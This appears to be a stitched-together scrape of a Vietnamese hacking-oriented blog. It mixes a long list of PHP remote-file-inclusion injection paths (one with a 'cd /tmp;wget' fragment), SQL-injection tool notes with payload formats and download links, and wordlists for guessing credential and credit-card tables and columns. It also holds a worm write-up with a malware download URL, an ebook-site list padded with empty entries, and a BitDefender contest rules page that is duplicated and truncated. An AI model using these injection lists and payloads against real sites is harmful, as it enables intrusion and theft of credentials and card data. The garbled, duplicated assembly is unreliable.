include/footer.inc.php?_AMLconfig[cfg_serverpath]=
eyeos/desktop.php?baccio=
ashnews.php?pathtoashnews=
index.php?modpath=
becommunity/community/index.php?pageurl=
index.php?sqld=
modules/module_db.php?pivot_path=
catalog/includes/include_once.php?include_file=
cgi-bin/calendar.pl?fromTemplate=
live/inc/pipe.php?HCL_path=
zb41/include/write.php?dir=
cgi-bin/awstats.pl?logfile=
presse/stampa.php3?azione=
inc/step_one_tables.php?server_inc=
index.php?mainpage=
phpprojekt/lib/authform.inc.php?path_pre=
captionator.php?GALLERY_BASEDIR=
_head.php?_zb_path=.example.com
achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=
gallery/captionator.php?GALLERY_BASEDIR=.example.com
globals.php3?LangCookie=.example.com
include/msql.php?inc_dir=
include/mssql7.php?inc_dir=
include/mysql.php?inc_dir=
include/oci8.php?inc_dir=
include/postgres.php?inc_dir=
include/postgres65.php?inc_dir=
install.php?phpbb_root_dir=
mantis/login_page.php?g_meta_inc_dir=
page.php?template=
phorum/admin/actions/del.php?include_path=
pollensondage.inc.php?app_path=
user/agora_user.php?inc_dir=
user/ldap_example.php?inc_dir=
userlist.php?ME=.example.com
_functions.php?prefix=
cpcommerce/_functions.php?prefix=
ashnews.php?pathtoashnews=cd /tmp;wget
eblog/blog.inc.php?xoopsConfig[xoops_url]=
b2-tools/gm-2-b2.php?b2inc=
includes/include_once.php?include_file=
modules.php?name=jokeid=
index.php?site=
livehelp/inc/pipe.php?HCL_path=
hcl/inc/pipe.php?HCL_path=
support/faq/inc/pipe.php?HCL_path=
help/faq/inc/pipe.php?HCL_path=
helpcenter/inc/pipe.php?HCL_path=
live-support/inc/pipe.php?HCL_path=
gnu3/index.php?doc=
gnu/index.php?doc=
phpgwapi/setup/tables_update.inc.php?appdir=
includes/calendar.php?phpc_root_path=
includes/setup.php?phpc_root_path=
inc/authform.inc.php?path_pre=
include/authform.inc.php?path_pre=
web_statistics/modules/coppermine/themes/default/theme.php?THEME_DIR=
web_statistics//tools/send_reminders.php?includedir=
web_statistics//include/write.php?dir=
web_statistics//modules/My_eGallery/public/displayCategory.php?basepath=
web_statistics//calendar/tools/send_reminders.php?includedir=
web_statistics//skin/zero_vote/error.php?dir=
web_statistics//coppercop/theme.php?THEME_DIR=
includes/header.php?systempath=
Gallery/displayCategory.php?basepath=
index.inc.php?PATH_Includes=
nphp/nphpd.php?nphp_config[LangFile]=
ashheadlines.php?pathtoashnews=
demo/includes/init.php?user_inc=
jaf/index.php?show=
inc/shows.inc.php?cutepath=
poll/admin/common.inc.php?base_path=
sources/post.php?fil_config=
bb_lib/checkdb.inc.php?libpach=
include/livre_include.php?chem_absolu=
index.php?pageurl=
derniers_commentaires.php?rep=
modules/coppermine/themes/default/theme.php?THEME_DIR=
coppermine/themes/maze/theme.php?THEME_DIR=
allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
agendax/addevent.inc.php?agendax_path=
main.php?page=
default.php?page=
index.php?action=
index1.php?p=
index2.php?x=
index2.php?content=
index.php?conteudo=
GradeMap/index.php?page=
phpopenchat/contrib/yabbse/poc.php?sourcedir=
calendar/calendar.php?serverPath=
calendar/functions/popup.php?serverPath=
calendar/events/header.inc.php?serverPath=
calendar/events/datePicker.php?serverPath=
calendar/setup/setupSQL.php?serverPath=
calendar/setup/header.inc.php?serverPath=
install/index.php?G_PATH=
support/mailling/maillist/inc/initdb.php?absolute_path=
coppercop/theme.php?THEME_DIR=
dotproject/modules/projects/addedit.php?root_dir=
dotproject/modules/projects/view.php?root_dir=
dotproject/modules/projects/vw_files.php?root_dir=
dotproject/modules/tasks/addedit.php?root_dir=
dotproject/modules/tasks/viewgantt.php?root_dir=
My_eGallery/public/displayCategory.php?basepath=
index.php?meio.php=
index.php?configFile=
index.php?do=
phpshop/index.php?base_dir=
contacts.php?cal_dir=
convert-date.php?cal_dir=

Thực chất, chúng là cặp email trong cùng một kịch bản của hacker. Kịch bản tương tác diễn ra như sau:

Email đầu tiên không đính kèm file và chỉ có một nhiệm vụ duy nhất là khiến người nhận tin vào một câu chuyện thú vị: có người biết bạn qua Internet, muốn làm quen và sẽ gửi cho bạn vài bức ảnh. Đối với người sử dụng, email này có vẻ như vô hại và chắc chắn không ít người trả lời email kết bạn này.

Không lâu sau đó, người sử dụng sẽ nhận được một email khác, lần này có đính kèm “file ảnh” như đã đề cập trong email trước. Nhiều người sử dụng bị thuyết phục bởi kịch bản khá logic và tương tác này đã mở file đính kèm, và vậy là máy tính của họ bị nhiễm virus.

Virus này (Bkav nhận diện với tên W32.FakeHotpics.Worm) khi được thực thi sẽ download FakeAV từ địa chỉ : http://webcontrol-panel.us/l[removed]atch/softpatch.php?afid=154

Source: http://blog.bkav.com.vn/kich-ban-tuong-tac-giup-hacker-phat-tan-virus-qua-spam-email-thanh-cong%E2%80%9D-hon/

Bôi đen để tránh hại site
Đã report cho admin

Lưu ý: Nếu trong cấu hình của PHP (php.ini), register_global mà thiết lập off thì biến $page không được coi như là một biến toàn cục và do vậy nó không thể thay đổi thông qua URL. Và câu lệnh include sẽ phải là $_GET[‘page’], $_POST[‘page’], $_REQUEST[‘page’] hoặc $_COOKIE[‘page’] thay vì $page.

lang:php (include|require)(_once)?\s*[‘”(]?\s*\$_(GET|POST|COOKIE)

CEH.vn
KMA
SinhvienIT
WIKI

Hãy xem sự nguy hiểm của nó :)))))

Demo

# Notepad – Dude, now please let everyone know where you keep this notepad 
# PGP encrypted file
# Winrar SXF
# Draft in gmail

# 1PasswordPro
# PasswordCard-
# Xmarks –  still???
# PasswordSafe

Soucce: https://spreadsheets.google.com/viewform?formkey=dDFkdXNBUlRKRVBvR3A1eHVFa2tZV0E6MQ

http://clubhack.com/favorite-password-manager/

• Works with even SSL i.e https
• Faster Approach
• Concat must be compulsary like this: concat(0x7375626861736864617379616d2e636f6d,0x3a,USERNAME_COLUMN,0x3a,PASSWORD_COLUMN,0x7375626861736864617379616d2e636f6d)
• And at end of the URL u need to have limit+ this is compulsary
• Added Start Count
• Fixed Bug
• Added Cookie Support

Home page: http://scan.subhashdasyam.com/dumper.php
Đọc kỹ hướng dẫn sử dụng trước khi dùng :))
Nếu bạn muốn dụng tool offline thì Havij  hoặc Pangolin :))

Pangolin is a penetration testing, SQL Injection test tool on database security. It finds SQL Injection vulnerabitlities.Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user”s specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.”

Pangolin release notes:
1. Enhanced ability to Inject.
2. Enhanced Auto-Analyzed Keywords function accuracy.
3. Add ability to auto dump table and column.  (This function will not re-dump data when data exist in Table view).
4. Fixed issue of garbled  Auto-Analyzed Keywords when SQL Injection point bee loaded. 
5. Fixed http header "Content-Length" issue. Auto delete this parameter.
6. Fixed issue of Table view.
7. Fixed issue of load from.
8. Fixed issue of Cookie Injection when valued contains "=".

Home page: http://www.nosec-inc.com/en/news/2010/1224/43.html

Download: Bản 3.2.3.1105 http://down3.nosec.org/pangolin_free_edition_3.2.3.1105.zip

Hướng dẫn: http://www.nosec-inc.com/en/uploads/PangolinWhitePaper.pdf

Hướng dẫn: http://www.nosec-inc.com/en/uploads/PangolinDataSheet.pdf

about
access
accnt
accnts
account
accounts
admin
admin_id
admin_name
admin_pass
admin_passwd
admin_password
admin_pwd
admin_user
admin_userid
admin_username
adminemail
adminid
administrator
administrator_name
administrators
adminlogin
adminmail
adminname
adminpass
adminpassword
adminpaw
adminpwd
admins
AdminUID
adminuser
adminuserid
adminusername
aid
aim
apwd
auid
auth
authenticate
authentication
blog
cc_expires
cc_number
cc_owner
cc_type
cfg
cid
client
clientname
clientpassword
clients
clientusername
conf
config
contact
converge_pass_hash
converge_pass_salt
crack
customer
customers
customers_email_address
customers_password
cvvnumber]
data
db_database_name
db_hostname
db_password
db_username
download
e_mail
email
e-mail
emailaddress
emer
emni
emniplote
emri
fjalekalimi
fjalekalimin
full
gid
group
group_name
hash
hashsalt
homepage
icq
icq_number
id
id_group
id_member
images
ime
index
ip_address
ipaddress
kodi
korisnici
korisnik
kpro_user
last_ip
last_login
lastname
llogaria
log
login
login_admin
login_name
login_pass
login_passwd
login_password
login_pw
login_pwd
login_user
login_username
logini
loginkey
loginout
logins
logo
logohu
lozinka
mail
md5hash
mem_login
mem_pass
mem_passwd
mem_password
mem_pwd
member
member_login_key
member_name
memlogin
mempassword
mima
my_email
my_name
my_password
my_username
myname
mypassword
myusername
name
nc
new
news
nick
number
nummer
p_assword
p_word
pass
pass_hash
pass_w
pass_word
pass1word
passw
passwd
password
passwordsalt
passwort
passwrd
perdorimi
perdoruesi
personal_key
phone
privacy
psw
punetoret
punonjes
pw
pwd
pword
pwrd
salt
sb_admin_name
sb_pwd
search
secretanswer
secretquestion
serial
session_member_id
session_member_login_key
sesskey
setting
sid
sifra
spacer
status
store
store1
store2
store3
store4
table_prefix
temp_pass
temp_password
temppass
temppasword
text
u_name
uid
un
uname
user
user_admin
user_email
user_icq
user_id
user_ip
user_level
user_login
user_n
user_name
user_pass
user_passw
user_passwd
user_password
user_pw
user_pwd
user_pword
user_pwrd
user_un
user_uname
user_username
user_usernm
user_usernun
user_usrnm
user1
useradmin
userid
userip
userlogin
usern
username
usernm
userpass
userpassword
userpw
userpwd
users
usr
usr_n
usr_name
usr_pass
usr2
usrn
usrnam
usrname
usrnm
usrpass
usrs
warez
wp_users
xar_name
xar_pass

a_admin
account
accounts
ACT_INFO
adm
admin
admin_user
admin_userinfo
administrator
adminuser
art
article_admin
bbs
book
clubconfig
company
config
dbadmins
info
login
login_admin
login_admins
login_user
login_users
logins
lost_pass
lost_passwords
lostpass
lostpasswords
m_admin
manage
manager
member
memberlist
members
movie
movies
news
password
pwd
pwds
reguser
sb_host_admin
superuser
sysadmin
sysadmins
sysuser
sysusers
tb_admin
tb_administrator
tb_login
tb_member
tb_members
tb_user
tb_username
tb_usernames
tb_users
tbl_user
tbl_users
tbladmins
tblclients
tblservers
tbluser
user
user_admin
user_info
user_list
user_login
user_logins
user_names
userinfo
userlist
username
usernames
userrights
users
webadmin
webadmins
Webmaster
Webuser
x_admin

Như vậy, ngoài Havij, Pangolin là công cụ tro giúp cho việc tấn công bằng SQL Inject được nhanh chóng hơn :)) . Và, chúng ta nhận thấy 1 điều rằng :)). Điều quan trọng trong 2 tool này chính là cơ sở dữ liệu về Table và Columns. Biết đâu có cái bảng như này :)). Table name: Bang_admin , Các columns là: ten,email,matkhau :))

Home page: http://itsecteam.com/en/projects/project1_page2.htm

Download: http://itsecteam.com/files/havij/Havij1.14Free.rar

Hướng dẫn sử dụng: http://itsecteam.com/files/havij/havij_help-english.pdf

Lưu ý:

Tool có thể chứa mã độc

Muốn hiểu bản chất của vấn đề thì nên đọc tài liệu cơ bản :)).

1. Advand SQL Inject

2. introduction-to-sql-injection

Download Full source code: http://pastebin.com/uk0NZ758

 Link mediafire: http://www.mediafire.com/?39jhbl9072sbqox

Source:  pentestit.com

 Ý tưởng của mình sưu tập khoảng 100 site có uy tín, nhưng có lẽ là hơi tham vọng quá :)). Có được độ chục site uy tín là tốt rồi, các site khác phần lớn copy link hoặc tích hợp tính năng của các trang tìm kiếm vào (Google, Bing,...)

Một số site mình hay tìm kiếm có đánh dấu:

1. eBook Search Queen

2. FlazX <====================== Tội phạm máy tính

3. e-Book Search

4. Ebookee <===================== Tội phạm máy tính

5. Docstoc

6. Brupt

7. PDF Search Online

8. Pdf Search Engine

9. PDFoxy

10. PDF Database

11. Toodoc

12. Free Ebook Search Engine

13. Ebook Search Engine

14. ShareMiner

15. PDFoo

16. Data-Sheet Search Engine

17. pdfgeni

18. PDFse Ebook Search

19. LooKPDF

20. PDFdig

21. pdfind

22. PDF Searcher

23. PDF One

24. FreeComputerBooks

25. eBook Searchr

26. Bookilook <================== Tội phạm máy tính

27. Scribd <===================== Tội phạm máy tính

28. SlideShare <================== Tội phạm máy tính

 29. Runet.ru <=================== Tội phạm máy tính

30. library.nu

31.http://www.0xdeadbeef.info/

32. Ebookw.net <================= Tội phạm máy tính

33. http://www.hvaonline.net/book/  <=========== :))

34. http://www.0xdeadbeef.info/      <=========== :))

35. http://share-book.com

36. http://docs.bor.org.ua/eBooks/                         update: 6/5/2011

37.

38.

39.

40.

41.

42.

43.

44.

45.

46.

47.

48.

49.

50.

51.

52.

53.

54.

55.

56.

57.

58.

59.

60.

61.

62.

63.

64.

65.

66.

67.

68.

69.

70.

71.

72.

73.

74.

75.

76.

77.

78.

79.

80.

81.

82.

83.

84.

85.

86.

87.

88.

89.

90.

91.

92.

93.

94.

95.

96.

97.

98.

99.

100. Google.com <============ Trang này khỏi phải giới thiệu :)

OFFICIAL RULES 
1. PROMOTION SPONSOR AND ORGANIZER 
The sponsor and organizer of promotion “BitDefender’s Twitter iPad competition” is BITDEFENDER SRL, a Romanian legal entity with registered seat at 24 West Gate Park, bldg. H2, ground floor, Preciziei Blvd., Bucharest, sector 6, registered with the Bucharest Trade Register under no J40/20427/2005, tax ID RO18189442, duly represented by Mr. Florin Talpes- General Manager. 
2. DURATION 
Promotion “BitDefender’s Twitter iPad competition” begins 4 May 2011 and it ends on the 30 May 2011.
3. PARTICIPANTS 
Promotion “BitDefender’s Twitter iPad competition” is open to any individual who is eighteen (18) years of age or older and who participates in at least one weekly contest organized as part of promotion “BitDefender’s Twitter iPad competition” between May 4, 2011, 00:00 and May 30, 2011, 23:59 Romanian Time. 
No purchase of a BitDefender product is necessary to enter or win. Purchasing a BitDefender product will not increase your chances of winning. 
Following categories are not eligible for the promotion: 
- BitDefender employees, their spouses and family members up to and including the second degree of kinship. 
- Twitter employees, their spouses and immediate family members up to and including the second degree of kinship. 
- Individuals who are residents of the UK.
- Individuals who are residents of countries where sweepstakes are forbidden under the law. 
To enter the promotion, the user has to follow @bitdefender and post on his account the following message: « Follow @bitdefender and retweet this message to win free software and an iPad 2. Terms: http://bit.ly/RT_Contest »
To participate in this contest, users can also use the landing page of the contest located at http://www.bitdefender.com/twittercontest .
Users are not allowed to use multiple twitter accounts to enter the contest, automated posting of the message or spamming is also not allowed. Any user who attempts to fraud the contest through the described above, or other will be disqualified.
4. CONDITIONS FOR PARTICIPATION 
In order for their entries to be considered valid, the individuals who registered in the promotion must meet the following conditions cumulatively: 
a. To meet the eligibility conditions, as specified in Art. 3 of the Official Rules; and 
b. To enter the contest by following the @bitdefender twitter account and post the following message in english: « Follow @bitdefender and retweet this message to win free software and an iPad 2. Terms: http://bit.ly/RT_Contest » . To participate in this contest, users can also use the landing page of the contest located at http://www.bitdefender.com/twittercontest .
c. To not use multiple accounts or autmatic posting systems.
5. PIZES OF PROMOTION “BitDefender’s Twitter iPad competition” 
The big prize consists of a iPad 2 32gb WiFi with a maximum value of 600 Euro, VAT included. The big prize will be awarded when the total number of followers of the @bitdefender account reaches 9000 followers.
There are 20 weekly prizes which consist of BitDefender Internet Security 2011 licenses valid for 1 year. The total number of licenses is 80.
6. PRIZE AWARDING MECHANISM 
 The big prize of promotion “BitDefender’s Twitter iPad competition” will be awarded through a lucky draw held the next day after we reach 9000 followers on the @bitdefender account.
The lucky draw and the prize awarding procedure will be performed under the direct supervision of a commission consisting of one representative of the Sponsor and Organizer and one attorney at law chosen by the Sponsor and Organizer, the latter being in charge of drawing up the prize awarding official note. 
 The winner of the big prize, consisting of one iPad 2 32gb WiFi will be announced through and on the @bitdefender account ( http://www.twitter.com/bitdefender ), in in 2 days from the lucky draw.
If the winner of the big prize fails to answer the Sponsor and Organizer’s e-mail within 15 days, and if 2 subsequent attempts to contact such winner fail as well, a new winner will be determined; the lucky draw procedure will be repeated only once. 
If the winner of a weekly prize fails to answer within 5 days, a new winner will be determined and the lucky draw procedure will be repeated only once. 
 In order for prize winners to be validated, such winners will be required to present their ID upon being handed over the prize. 
Prizes will only be awarded if the potential winners fully comply with these Official Rules. 
The draw will take place on http://www.random.org/lists/ , all participant data will be entered into the system . For the weekly prizes, the first 20 participants after the draw will be declared winners. For the big prize, first participant in the list will be declared winner.
7. PRIZE ALTERNATIVES 
 Prize winners cannot choose to receive the equivalent value of prizes, either in cash or in kind, and they cannot request changes in the prizes’ technical specifications. 
The Sponsor and Organizer does not offer any guarantee and refuses the granting of any express or implicit guarantee with respect to any of the prizes awarded during this promotion. 
8. TAXES AND CHARGES 
The promotion Sponsor and Organizer is in no way liable for the payment of charges, taxes or other financial obligations arising either from the awarded prizes.
9. LUCKY DRAW OFFICIAL RULES 
 The Official Rules for participation are available free of charge for anyone (whether a participant or not) on web site: www.bitdefender.com/twittercontest
and at the registered seat of S.C. BITDEFENDER S.R.L., at 24 Preciziei Blvd, West Gate Park, Bldg. H 2, ground floor, Bucharest, sector 6. 
10. FORCE MAJEURE 
 Force majeure shall be deemed as any unforeseen event, beyond control or remedy by the Sponsor and Organizer, including such Sponsor and Organizer’s inability, by way of reasons independent of its will, to meet its obligations hereunder. 
 If the above-mentioned situation occurs or in the event of another force majeure situation which prevents or which totally or partially delays the enforcement of the Official Rules and the continuation of promotion “ BitDefender’s Twitter iPad competition”, the Sponsor and Organizer will be free from any liability as regards the meeting of its obligations for as long as such meeting of obligations is hindered or delayed, as per art. 1082 and 1083 of the Civil Code. 
 In the event the Sponsor and Organizer invokes force majeure, such Sponsor and Organizer will be bound to communicate to the participants in promotion “BitDefender’s Twitter iPad competition” the existence of a force majeure event within 5 days as of the appearance of such event. 
 Force majeure events will be announced on the Sponsor and Organizer’s website at: www.bitdefender.com/enjoytheridewinners. 
11. END OF PROMOTION 
 This promotion may end in the event of a force majeure situation or if there is a change in the legal framework which calls for an increase in the budget allotted to this project in order for the promotion lucky draw to be organized and to take place. 
12. PERSONAL DATA PROTECTION 
Participation in the campaign implies participants’ tacit consent that their personal data be kept and processed by the Sponsor and Organizer with a view to such Sponsor and Organizer being able to subsequently send information to said participants, if necessary. 
The Sponsor and Organizer undertakes not to transfer personal data to third parties other than the companies involved in organizing the Promotion. Participants in the promotion are guaranteed the rights set forth in Law no. 677/2001 regarding the protection of individuals as far as personal data processing and free circulation are concerned. Upon filing a dated and signed written application sent at 24 Preciziei Blvd., West Gate Park, Bldg. H2, ground floor, Bucharest, sector 6, participant will be entitled to the following: 
- Right to data access: any concerned individual is entitled to obtain from the operator, upon request, free of charge and in response to one request per year, the confirmation of the fact that the respective person’s data is or is not processed by the respective operator; 
- Right to amend data: any individual is entitled to obtain from the operator, upon request and free of charge: 
a. The correction, updating, blocking or deletion of data the processing of which does not comply with the law, especially as far as incomplete or inaccurate data is concerned, as applicable; 
b. Transforming into anonymous data the information the processing of which does not comply with the law, as applicable; 
c. Notifying third parties whose personal data has been disclosed about any operation performed as per item a) or b), unless such notification proves impossible or it presupposes efforts that are disproportionate to the legitimate interest which may have been injured; 
- Right to denial: the concerned individual is entitled to deny the processing of any of his/her personal data, at any time, by justified and legitimate causes related to his/her particular situation, except where there are legal provisions to the contrary. 
With a view to exercising the above/mentioned right, the concerned individual may submit a written, dated and signed request to this end to the operator. 
The operator is bound to communicate the steps taken and, where applicable, the name of the third party to whom the concerned individual’s personal data was disclosed, within 15 days as of the receipt of the request. The Sponsor and Organizer undertakes that, upon first communicating in writing with the persons included in the database created in this way will inform the respective individuals of their rights under Law 677/2001. 
Unless participants submit a written request to the contrary, they agree to the Sponsor and Organizer’s collecting and using their personal data in the manner described in the paragraph above. Participants may, at any time, withdraw their consent to the use of their personal data or to the receipt of any information or correspondence, by sending a written request to this end at the Sponsor and Organizer’s address. 
13. LEGAL GROUNDS 
 These Official Rules comply with the provisions of Government Order no. 99/2000 concerning the sale of market products and services, and with Government Decision no. 333/2003 – Methodological Norms for the Enforcement of Government Order no. 99/2000 concerning the sale of market products and services and with Law 677/2001 – concerning individual’s protection as far as personal data processing and free circulation are concerned. 
14 . PARTICIPANTS 
If the winner of a prize is under 18 years of age, he/she will not be entitled to receiving the prize as he/she was not eligible for this promotion in the first place. The lucky draw shall be resumed and the Sponsor and Organizer will be exempt from any liability arising from the awarding of the respective prize, as well as from the payment of any damages or claims of any nature in connection therewith. 
15. LITIGTIONS 
 In the event of a dispute on an entry’s validity, the commission’s decision shall be final. 
 By participating in this promotion and by filling in the form provided as part of campaign “ BitDefender’s Twitter iPad competition” participants agree to observing and complying with all provisions, terms and conditions hereof. 
Any challenges will be filed in writing, within 7 working days as of the lucky draw date, at the registered seat of SC BITDEFENDER SRL, 24 Preciziei Blvd., West Gate, Bldg. H2, groundfloor, Bucharest sector 6. 
In the event that the commission decide to admit the challenge, the lucky draw procedure will be resumed at a date to be publicly announced as soon as possible after the challenge admission. 
Any litigation that may arise between the Sponsor and Organizer and the participants shall be solved amicably and, where an amicable settlement is not possible, litigations will be referred for settlement to the Romanian courts of law of competent jurisdiction. 
The Sponsor and Organizer reserves the right to modify the dates and duration of the promotion, changes which will be publicly announced. 
16. OTHER REGULATIONS 
 This promotion is in no way sponsored, endorsed or administered by, or associated with Twitter. You understand that you are providing your information to bitdefender™ and not to Twitter. 
 By entering promotion “BitDefender’s Twitter iPad competition”, participants are aware of and unconditionally agree to these rules as well as with the decisions of BITDEFENDER SRL (Sponsor and organizer of the sweepstakes) with registered seat at 24 Preciziei Blvd., West Gate Park, Bldg. H2, Bucharest, sector 6, whose decisions will be final and legally binding from all points of view . 
All complaints regarding the awarded prizes and submitted after the signing date of the acknowledgment of prize receipt will be disregarded and they will not incur any liability on the Sponsor and Organizer’s part. 
In the event of attempted or successful defrauding of the system or of any actions likely to injure the Sponsor and Organizer’s image, such Sponsor and Organizer reserves the right to take all necessary steps in order to remedy the resulting situation. 
The Sponsor and Organizer undertakes no liability for any fact which results in the impossibility of validating a winner and in the resuming of the draw until another winner is validated, such as the impossibility of notifying the winner in writing due to such winner’s change of e-mail address or said winner’s failure to receive or read his/her correspondence, etc. etc. The Sponsor and Organizer will take all steps necessary for the contest to take place under normal circumstance, as per the above, but said Sponsor and Organizer does not undertake any liability for the possible complaints filed by participants and which do not refer to a breach in the legal framework in force. 
These Official Rules are available to anyone, for free, at the Sponsor and Organizer’s registered seat at 24 Preciziei Blvd., West Gate, Bldg. H2, Bucharest, sector 6 and on web site www.bitdefender.com/twittercontest. 
Drawn up at the registered seat of BitDefender SRL in 4 copies, one of which to be filed by the Sponsor and Organizer with the General Department of Public Income and Monopoly Management within the Ministry of Public Finance, by the promotion beginning date. 
Sponsor and Organizer of promotion “BitDefender’s Twitter iPad competition” 
BITDEFENDER SRL 
By General Manager 
Florin Talpes 

OFFICIAL RULES 
1. PROMOTION SPONSOR AND ORGANIZER 
The sponsor and organizer of promotion “BitDefender’s Twitter iPad competition” is BITDEFENDER SRL, a Romanian legal entity with registered seat at 24 West Gate Park, bldg. H2, ground floor, Preciziei Blvd., Bucharest, sector 6, registered with the Bucharest Trade Register under no J40/20427/2005, tax ID RO18189442, duly represented by Mr. Florin Talpes- General Manager. 
2. DURATION 
Promotion “BitDefender’s Twitter iPad competition” begins 4 May 2011 and it ends on the 30 May 2011.
3. PARTICIPANTS 
Promotion “BitDefender’s Twitter iPad competition” is open to any individual who is eighteen (18) years of age or older and who participates in at least one weekly contest organized as part of promotion “BitDefender’s Twitter iPad competition” between May 4, 2011, 00:00 and May 30, 2011, 23:59 Romanian Time. 
No purchase of a BitDefender product is necessary to enter or win. Purchasing a BitDefender product will not increase your chances of winning. 
Following categories are not eligible for the promotion: 
- BitDefender employees, their spouses and family members up to and including the second degree of kinship. 
- Twitter employees, their spouses and immediate family members up to and including the second degree of kinship. 
- Individuals who are residents of the UK.
- Individuals who are residents of countries where sweepstakes are forbidden under the law. 
To enter the promotion, the user has to follow @bitdefender and post on his account the following message: « Follow @bitdefender and retweet this message to win free software and an iPad 2. Terms: http://bit.ly/RT_Contest »
To participate in this contest, users can also use the landing page of the contest located at http://www.bitdefender.com/twittercontest .
Users are not allowed to use multiple twitter accounts to enter the contest, automated posting of the message or spamming is also not allowed. Any user who attempts to fraud the contest through the described above, or other will be disqualified.
4. CONDITIONS FOR PARTICIPATION 
In order for their entries to be considered valid, the individuals who registered in the promotion must meet the following conditions cumulatively: 
a. To meet the eligibility conditions, as specified in Art. 3 of the Official Rules; and 
b. To enter the contest by following the @bitdefender twitter account and post the following message in english: « Follow @bitdefender and retweet this message to win free software and an iPad 2. Terms: http://bit.ly/RT_Contest » . To participate in this contest, users can also use the landing page of the contest located at http://www.bitdefender.com/twittercontest .
c. To not use multiple accounts or autmatic posting systems.
5. PIZES OF PROMOTION “BitDefender’s Twitter iPad competition” 
The big prize consists of a iPad 2 32gb WiFi with a maximum value of 600 Euro, VAT included. The big prize will be awarded when the total number of followers of the @bitdefender account reaches 9000 followers.
There are 20 weekly prizes which consist of BitDefender Internet Security 2011 licenses valid for 1 year. The total number of licenses is 80.
6. PRIZE AWARDING MECHANISM 
 The big prize of promotion “BitDefender’s Twitter iPad competition” will be awarded through a lucky draw held the next day after we reach 9000 followers on the @bitdefender account.
The lucky draw and the prize awarding procedure will be performed under the direct supervision of a commission consisting of one representative of the Sponsor and Organizer and one attorney at law chosen by the Sponsor and Organizer, the latter being in charge of drawing up the prize awarding official note. 
 The winner of the big prize, consisting of one iPad 2 32gb WiFi will be announced through and on the @bitdefender account ( http://www.twitter.com/bitdefender ), in in 2 days from the lucky draw.
If the winner of the big prize fails to answer the Sponsor and Organizer’s e-mail within 15 days, and if 2 subsequent attempts to contact such winner fail as well, a new winner will be determined; the lucky draw procedure will be repeated only once. 
If the winner of a weekly prize fails to answer within 5 days, a new winner will be determined and the lucky draw procedure will be repeated only once. 
 In order for prize winners to be validated, such winners will be required to present their ID upon being handed over the prize. 
Prizes will only be awarded if the potential winners fully comply with these Official Rules. 
The draw will take place on http://www.random.org/lists/ , all participant data will be entered into the system . For the weekly prizes, the first 20 participants after the draw will be declared winners. For the big prize, first participant in the list will be declared winner.
7. PRIZE ALTERNATIVES 
 Prize winners cannot choose to receive the equivalent value of prizes, either in cash or in kind, and they cannot request changes in the prizes’ technical specifications. 
The Sponsor and Organizer does not offer any guarantee and refuses the granting of any express or implicit guarantee with respect to any of the prizes awarded during this promotion. 
8. TAXES AND CHARGES 
The promotion Sponsor and Organizer is in no way liable for the payment of charges, taxes or other financial obligations arising either from the awarded prizes.
9. LUCKY DRAW OFFICIAL RULES 
 The Official Rules for participation are available free of charge for anyone (whether a participant or not) on web site: www.bitdefender.com/twittercontest
and at the registered seat of S.C. BITDEFENDER S.R.L., at 24 Preciziei Blvd, West Gate Park, Bldg. H 2, ground floor, Bucharest, sector 6. 
10. FORCE MAJEURE 
 Force majeure shall be deemed as any unforeseen event, beyond control or remedy by the Sponsor and Organizer, including such Sponsor and Organizer’s inability, by way of reasons independent of its will, to meet its obligations hereunder. 
 If the above-mentioned situation occurs or in the event of another force majeure situation which prevents or which totally or partially delays the enforcement of the Official Rules and the continuation of promotion “ BitDefender’s Twitter iPad competition”, the Sponsor and Organizer will be free from any liability as regards the meeting of its obligations for as long as such meeting of obligations is hindered or delayed, as per art. 1082 and 1083 of the Civil Code. 
 In the event the Sponsor and Organizer invokes force majeure, such Sponsor and Organizer will be bound to communicate to the participants in promotion “BitDefender’s Twitter iPad competition” the existence of a force majeure event within 5 days as of the appearance of such event. 
 Force majeure events will be announced on the Sponsor and Organizer’s website at: www.bitdefender.com/enjoytheridewinners. 
11. END OF PROMOTION 
 This promotion may end in the event of a force majeure situation or if there is a change in the legal framework which calls for an increase in the budget allotted to this project in order for the promotion lucky draw to be organized and to take place. 
12. PERSONAL DATA PROTECTION 
Participation in the campaign implies participants’ tacit consent that their personal data be kept and processed by the Sponsor and Organizer with a view to such Sponsor and Organizer being able to subsequently send information to said participants, if necessary. 
The Sponsor and Organizer undertakes not to transfer personal data to third parties other than the companies involved in organizing the Promotion. Participants in the promotion are guaranteed the rights set forth in Law no. 677/2001 regarding the protection of individuals as far as personal data processing and free circulation are concerned. Upon filing a dated and signed written application sent at 24 Preciziei Blvd., West Gate Park, Bldg. H2, ground floor, Bucharest, sector 6, participant will be entitled to the following: 
- Right to data access: any concerned individual is entitled to obtain from the operator, upon request, free of charge and in response to one request per year, the confirmation of the fact that the respective person’s data is or is not processed by the respective operator; 
- Right to amend data: any individual is entitled to obtain from the operator, upon request and free of charge: 
a. The correction, updating, blocking or deletion of data the processing of which does not comply with the law, especially as far as incomplete or inaccurate data is concerned, as applicable; 
b. Transforming into anonymous data the information the processing of which does not comply with the law, as applicable; 
c. Notifying third parties whose personal data has been disclosed about any operation performed as per item a) or b), unless such notification proves impossible or it presupposes efforts that are disproportionate to the legitimate interest which may have been injured; 
- Right to denial: the concerned individual is entitled to deny the processing of any of his/her personal data, at any time, by justified and legitimate causes related to his/her particular situation, except where there are legal provisions to the contrary. 
With a view to exercising the above/mentioned right, the concerned individual may submit a written, dated and signed request to this end to the operator. 
The operator is bound to communicate the steps taken and, where applicable, the name of the third party to whom the concerned individual’s personal data was disclosed, within 15 days as of the receipt of the request. The Sponsor and Organizer undertakes that, upon first communicating in writing with the persons included in the database created in this way will inform the respective individuals of their rights under Law 677/2001. 
Unless participants submit a written request to the contrary, they agree to the Sponsor and Organizer’s collecting and using their personal data in the manner described in the paragraph above. Participants may, at any time, withdraw their consent to the use of their personal data or to the receipt of any information or correspondence, by sending a written request to this end at the Sponsor and Organizer’s address. 
13. LEGAL GROUNDS 
